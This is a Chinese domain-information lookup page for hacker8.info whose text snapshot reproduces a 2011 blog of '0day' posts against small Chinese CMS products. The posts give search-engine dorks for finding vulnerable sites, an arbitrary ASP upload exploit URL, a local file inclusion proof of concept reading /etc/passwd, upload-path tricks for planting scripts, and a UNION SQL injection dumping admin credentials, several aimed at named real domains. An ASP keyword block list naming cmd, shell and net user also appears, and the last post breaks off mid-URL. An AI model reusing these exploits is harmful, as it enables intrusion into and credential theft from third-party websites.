网站综合信息 www.hacker8.info
    • 标题:
    • 黑猫'blog 最新漏洞 0day漏洞 seo优化 
    • 关键字:
    •  
    • 描述:
    • Discuz!NT 是康盛创想(Comsenz)旗下的一款功能强大的基于 ASP.NET 平台的社区软件。 漏洞分析:ajaxtopicinfo.ascx用户控件 poster SQL注入 ... 
    • 域名信息
    •   
    • 备案信息
    • 备案号: 
    网站收录SEO数据
    • 搜索引擎
    • 收录量
    • 反向链接
    • 其他
    • 百度
    • 0  
    • 247,000  
    • 快照:-  
    • Google
    • 0  
    • 0  
    • pr:0  
    • 雅虎
    • 0  
    •  
    •  
    • 搜搜
    • 0  
    •  
    •  
    • 搜狗
    • 0  
    •  
    • 评级:1/10  
    • 360搜索
    • 0  
    •  
    •  
    域名流量Alexa排名
    •  
    • 一周平均
    • 一个月平均
    • 三个月平均
    • Alexa全球排名
    • -  
    • 平均日IP
    • 日总PV
    • 人均PV(PV/IP比例)
    • 反向链接
    • dmoz目录收录
    • -  
    • 流量走势图
    域名注册Whois信息

    hacker8.info


    获取时间: 2016年10月11日 16:37:05
    NOT FOUND
    >>> Last update of WHOIS database: 2016-10-11T08:39:47Z <<<

    Access to AFILIAS WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Afilias registry database. The data in this record is provided by Afilias Limited for informational purposes only, and Afilias does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to(a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Afilias reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
    其他后缀域名
    • 顶级域名
    • 相关信息
    网站首页快照(纯文字版)
    抓取时间:2016年10月11日 16:36:55
    网址:http://www.hacker8.info/
    标题:黑猫'blog 最新漏洞 0day漏洞 seo优化
    关键字:
    描述:Discuz!NT 是康盛创想(Comsenz)旗下的一款功能强大的基于 ASP.NET 平台的社区软件。 漏洞分析:ajaxtopicinfo.ascx用户控件 poster SQL注入 ...
    主体:
    
    黑猫'blog 最新漏洞 0day漏洞 seo优化
    最新漏洞 0day漏洞 seo优化
    黑猫
    最新漏洞
    网络安全
    seo
    wordpress
    心情日记
    友情连接
    2011九月26
    asp网上商城cookies注入漏洞
    
    最新漏洞
    0 Comments
    关键字: inurl:sort.asp?sort_id= 或者 inurl:pinpai.asp?pinpai_id= ‘表单数据初步判断,检验攻击语句 Code: Form_Badword=”%20or%20|’|””|%|update|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe” if request.form<>”” and uBits =”” then Chk_badword=split(Form_Badword,”|”) FOR EACH name IN Request.Form for i=0 to ubound(Chk_badword) If Instr(LCase(request.form(name)),Chk_badword(i))<>0 Then showerr “e” End If NEXT NEXT end if ‘参数初步判断,检验攻击语句 Query_Badword=”%20or%20|’|””|%|update|=|select|delete|insert|java|script|exec|cmd|shell|count|mid|char|drop|master|from|net%20user|/add|iframe” if request.QueryString<>”” then Chk_badword=split(Query_Badword,”|”) …
    2011九月26
    優吉兒網站管理系统 ODAY
    
    最新漏洞
    0 Comments
    EXP: admin/ugA_UploadImg.asp?hidfrmN=frmUG&hidtxtN=txtImgPath02&hidImgP=ImgSynLife&hidFileName=&hidReName=Y&hidReturn=Y&hidImgSize=400,533,160,120&hidFileSize=&hidImgType=jpg,jpeg,jpe,asp 19.复制代码 20.直接上传ASP,然后查看源文件。。即可。
    2011九月26
    酷纬企业网站管理系统本地包含漏洞
    
    最新漏洞
    0 Comments
    漏洞文件:inc/ajax.php 漏洞代码: <?php header(‘Content-Type:text/html; charset=utf-8′); $absolutepath = $_GET['absolutepath']; require_once($absolutepath.’inc/common.inc.php’); $sql = “update {$configTableHead}{$dbtable} set clicknum={$clicknum}+1 where id={$id}”; $result = $dbInstance->query($sql); ?> $absolutepath参数直接获取GET传递的值没有任何过滤加入require_once! 这个包含的而且还是数据库配置文件! POC: ajax.php?absolutepath=../../../../../../../../../../../etc/passwd%00.
    2011九月26
    自助拿站0day 漏洞 oday
    
    最新漏洞
    0 Comments
    googel搜索关键字:inurl:website/html/?163.html 利用方法: 在首页 “会员登录”处注册一个新用户登录,再回到首页,找到一个可以试用的模板, 点击“试用”后,根据提示填好内容,点“登录”来到后台,(默认后台为:http://www.lvbaowang.com/xxx/adm/index.php 默认账号webmaster 密码是你自己设置的) 在后台点击网站设置—界面风格” 记住你建的“模版目录名”,在后面查找地址时有用。点击后面的“修改”来到一个上传的地方。 这里就是整个的重点了。这里有两个上传的地方一个是“模版文件上传”,它上传成功后会出现在右边,它的上面格式为:xxx.php;.html。另一个是“图片文件上传”,它上传成功后在右边的“images”中,它的上传格式为:xxx.asp;.jpg。随便选一个上传都是可以的。 最后我们来找我们上传后文件的路径,这里我们经过查找已经知道了它的默认上传路径:http://www.lvbaowang.com/xxxx/templates/模版目录名/images/xxx.asp;.jpg(图片文件上传后的路径)。 http://www.lvbaowang.com/xxxx/templates/模版目录名/xxx.php;.html(模版文件上传后的路径)。注:模版目录名我们在前面已经得到。
    2011九月26
    企成汽车配件网站管理系统存在注入漏洞
    
    最新漏洞
    0 Comments
    by Mr.DzY code download: http://www.mycodes.net/25/4799.htm 证明: http://www.swit.cn/cms/carpj/RequireView.asp?id=6 union select%201,username,password,4,5,6,7,8,9 from nwebadmin
    2011九月26
    驾校培训网站管理系统 v1.0 漏洞
    
    最新漏洞
    0 Comments
    <% Set rsnews=Server.CreateObject(“ADODB.RecordSet”) sql=”update news set hits=hits+1 where id=”&cstr(request(“id”)) conn.execute sql %> */ 单纯的reuqest(),并没用指定是request.querystring(),还是request.form,或request.cookie (). 利用: http://www.lvbaowang.com/ji

    © 2010 - 2020 网站综合信息查询 同IP网站查询 相关类似网站查询 网站备案查询网站地图 最新查询 最近更新 优秀网站 热门网站 全部网站 同IP查询 备案查询

    2024-05-12 17:55, Process in 0.0062 second.